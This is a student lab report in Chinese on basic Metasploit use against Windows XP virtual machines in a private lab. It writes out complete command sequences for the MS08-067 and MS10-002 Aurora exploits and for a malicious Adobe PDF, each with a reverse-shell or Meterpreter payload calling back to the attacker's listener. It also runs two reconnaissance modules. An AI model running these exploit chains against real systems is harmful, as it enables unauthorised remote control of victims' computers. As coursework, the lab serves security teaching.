20155320《网络对抗》MSF基础应用
基础问题回答
用自己的话解释什么是exploit,payload,encode
- 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作
- payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击
encode,我觉得它就是一个加密工具
实践过程
使用到的虚拟机IP
| 虚拟机 | IP地址 |
|---|---|
| 靶机2 Vivian xp | 192.168.63.129 |
| 靶机3 | 192.168.63.131 |
| 攻击机 kali2 | 192.168.63.133 |
1.1一个主动攻击实践——ms08_067漏洞攻击;
这次需要用到靶机3和kali2
在kali的终端中输入msfconsole进入控制台
输入
use exploit/windows/smb/ms08_067_netapi使用该模块show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配
show playload可以查看可使用的载荷
set payload generic/shell_reverse_tcp,tcp反向回连
输入如下完成配置
set LHOST 192.168.63.133 此IP是kali的IPset LPORT 5320 端口set RHOST 192.168.63.131 此IP是靶机WIN XP的IP,特定漏洞端口已经固定
- show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配 ,输入set target 0
- 输入exploit 进行攻击
- 然后成功攻击的标志是出现如下结果,成功获得了XP靶机的shellcode,输入命令ipconfig可以看到和在XP上一样的结果
MS10_002_aurora漏洞攻击;
- 之前的配置和第一个主动攻击实验是一样的命令,依次输入如下即可
msfconsoleuse exploit/windows/browser/ms10_002_auroraset payload generic/shell_reverse_tcpset LHOST 192.168.63.133 //设置kali攻击IP,set RHOST 192.168.63.131set SRVPORT 5320
- 查看配置项,确认无误
- 输入exploit 运行,成功生成了一个URL
- 在靶机上的IE里输入URL,在攻击机kali上可以看到打开了session 1,但是奇怪的是他卡住了T_T,难受
- 我只能用session -i 1打开session1,成功取得靶机shell,输入ipconfig可以得到靶机的IP
针对客户端的攻击:adobe_toolbutton
这次用的是vivian-XP和kali2
- 进入MSF,后输入search adobe找到相应模块
- 输入以下命令,完成配置并创建pdf,打开显示隐藏文件,并在/root/.msf4/local/目录下找到20155320.pdf文件,如下图所示
use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模块set payload windows/meterpreter/reverse_tcpset LHOST 192.168.63.133 //设置kali攻击IP,set LPORT 5320set FILENAME 20155320.pdf
- 将这个pdf拷到靶机上
- 之后进入之前的监听模块,依次输入以下命令设置并监听即可,输入exploit后在靶机上打开pdf,回连成功(但是不知道为啥这个反应特别慢T_T)
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.63.133set LPORT 5320exploit
- 成功获取shellcode之后输入ipconfig,确认连上了正确的靶机
成功应用任何一个辅助模块:我应用了两个
其中一个是跟风弄的scanner,为了和别人不一样我还应用了一个gather的
通过参考了解了如何学习使用MSF的模块输入命令show auxiliary查看所有辅助模块
操作系统/类型/模块名称
1.gather/browser_info
这是一个搜集信息的模块
- 通过命令info gather/browser_info,查看模块的配置信息
- 输入use auxiliary/gather/browser_info使用这个模块,并根据要求设置相应的配置信息,目的是我要搜集Vivian-XP靶机的信息,所以将产生的URL网址在Vivian-XP的IE中打开,可以看到搜集到的信息如下:有windows系统类型,使用中文等信息,可以为攻击提供重要保障
2.scanner/dcerpc/tcp_dcerpc_auditor
- 我选择了模块scanner/dcerpc/tcp_dcerpc_auditor 进行试验,这是一个normal级别的,比较容易 -输入use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor使用这个辅助模块,设置成功后,可以运行,发现成功了
实验总结
这次的收获除了尝试了浏览器漏洞攻击、利用打开pdf攻击等有趣的攻击外,最大的收获是尝试了MSF的不同模块,发现原来使用起来都很便捷,按照要求配置好就可以应用了,同时发现MSF的功能也很多,信息搜集啥的简直不要太6了。